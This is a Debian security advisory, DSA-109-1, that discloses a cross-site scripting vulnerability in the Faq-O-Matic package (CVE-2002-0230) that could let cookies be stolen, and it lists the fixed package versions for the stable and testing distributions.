Debian Security Advisory
DSA-109-1 faqomatic -- cross-site scripting vulnerability
- Date Reported:
- 13 Feb 2002
- Affected Packages:
- Security database references:
- In Mitre's CVE dictionary: CVE-2002-0230.
- More information:
Due to unescaped HTML code Faq-O-Matic returned unverified scripting code to the browser. With some tweaking this enables an attacker to steal cookies from one of the Faq-O-Matic moderators or the admin.
This problem has been fixed in version 2.603-1.2 for the stable Debian distribution and version 2.712-2 for the current testing/unstable distribution.
We recommend that you upgrade your faqomatic package if you have it installed.
- Fixed in:
Debian GNU/Linux 2.2 (potato)
- Architecture-independent component:
MD5 checksums of the listed files are available in the original advisory.